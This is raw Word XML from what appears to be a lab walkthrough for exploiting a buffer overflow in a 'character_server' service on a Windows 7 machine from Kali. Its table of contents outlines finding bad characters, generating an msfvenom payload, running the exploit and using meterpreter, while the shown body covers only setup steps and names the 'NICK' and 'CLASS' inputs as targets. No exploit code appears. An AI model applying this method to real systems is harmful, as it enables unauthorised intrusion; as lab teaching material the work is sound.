            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D85D322" w14:textId="3E4B0380" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350172" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Find bad characters</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350172 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02017D79" w14:textId="36488456" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350173" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a new script with a badchars string</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350173 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E372E54" w14:textId="5F385F90" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350174" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Check the debugger on Windows 7</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350174 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75F8F5CD" w14:textId="789D6AF4" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350175" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remove bad character and try again with remaining bad char script</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350175 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AFAAD89" w14:textId="43E7AA60" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350176" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Generate a payload</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350176 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DE0488C" w14:textId="76324093" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350177" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Generate payload with msfvenom</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350177 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="104BEC5E" w14:textId="42B6FA8D" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350178" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Copy shellcode into python script</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350178 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BB78CE4" w14:textId="2C657B0F" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350179" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Run the exploit</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350179 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BA4F040" w14:textId="3456BCC5" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350180" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Start a handler on the attacker machine to catch the callback</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350180 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61A1B6E4" w14:textId="1BED939B" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350181" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Restart the process in the debugger on windows 7</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350181 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13F23B66" w14:textId="16E1D03A" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350182" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Run the exploit script</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350182 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EDD611D" w14:textId="321210E4" w:rsidR="001C5794" w:rsidRDefault="00270DF1">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc47350183" w:history="1">
            <w:r w:rsidR="001C5794" w:rsidRPr="009D7967">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Run meterpreter commands</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc47350183 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidR="001C5794">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="656E8A08" w14:textId="1DE3840F" w:rsidR="00EC231C" w:rsidRDefault="00EC231C">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="12D54E3E" w14:textId="77777777" w:rsidR="00EC231C" w:rsidRDefault="00EC231C" w:rsidP="00E04E1C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5ABB58" w14:textId="15C071AA" w:rsidR="00E04E1C" w:rsidRDefault="00E04E1C" w:rsidP="00E04E1C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc47350156"/>
      <w:r>
        <w:t>Start the vulnerable service on the Windows 7 box</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2EC46062" w14:textId="5E5288E6" w:rsidR="00B453A9" w:rsidRDefault="00852476">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7025D33E" wp14:editId="2F2E743C">
            <wp:extent cx="5943600" cy="3402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02330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA92A1F" w14:textId="40622A47" w:rsidR="00852476" w:rsidRDefault="00852476"/>
    <w:p w14:paraId="10FCB6B8" w14:textId="67226387" w:rsidR="00EC231C" w:rsidRDefault="00EC231C" w:rsidP="00EC231C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc47350157"/>
      <w:r>
        <w:t>Check the ip address of the server an</w:t>
      </w:r>
      <w:r w:rsidR="00270DF1">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> get the port it is listening on</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="504CB863" w14:textId="273FB0F5" w:rsidR="00852476" w:rsidRDefault="00852476">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B0D4BB7" wp14:editId="517466B1">
            <wp:extent cx="5943600" cy="3293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93745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0FAF08" w14:textId="1DD0A356" w:rsidR="00852476" w:rsidRDefault="00EC231C" w:rsidP="00EC231C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc47350158"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Test accessibility to the service from Kali using netcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3BA36904" w14:textId="31E6942F" w:rsidR="00852476" w:rsidRDefault="00852476">
      <w:r>
        <w:t>From Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF98E0" w14:textId="364E1DA4" w:rsidR="00852476" w:rsidRDefault="00852476">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="129FD133" wp14:editId="3E9A28CA">
            <wp:extent cx="5943600" cy="210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03120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD3E1A9" w14:textId="66D47A15" w:rsidR="00F22DB1" w:rsidRDefault="00F22DB1">
      <w:r>
        <w:t>This shows us that there are several variables that store user input, such as “NICK” “FIRST” “CLASS” etc.  We will attack “NICK” and “CLASS” in the next examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5DA00" w14:textId="5B4927DC" w:rsidR="00C8781A" w:rsidRDefault="00C8781A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55B99E" w14:textId="7090C70D" w:rsidR="00852476" w:rsidRDefault="00C8781A" w:rsidP="00C8781A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc47350159"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Start the debugger on the victim machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6B93D708" w14:textId="133446CB" w:rsidR="00852476" w:rsidRDefault="00852476">
      <w:r>
        <w:t>Open immunity debugger on Win7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C9AA2" w14:textId="5E1ECA82" w:rsidR="00C8781A" w:rsidRDefault="00C8781A">
      <w:r>
        <w:t xml:space="preserve">Attach to the “character_server” process </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075C826C" w14:textId="3A26B3D2" w:rsidR="00A268F6" w:rsidRDefault="00A268F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="403C7356" wp14:editId="7919300C">
            <wp:extent cx="3069771" cy="1688046"/>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1051" cy="1721743"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CD4B6A" w14:textId="0856A218" w:rsidR="00A268F6" w:rsidRDefault="00A268F6">
      <w:r>
        <w:t xml:space="preserve">Click on the “play” button </w:t>
      </w:r>
      <w:r w:rsidR="001C5794">
        <w:t xml:space="preserve">TWICE </w:t>
      </w:r>
      <w:r>
        <w:t>to run the service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C35FBE" w14:textId="5E9CFB04" w:rsidR="000C0161" w:rsidRDefault="00A268F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
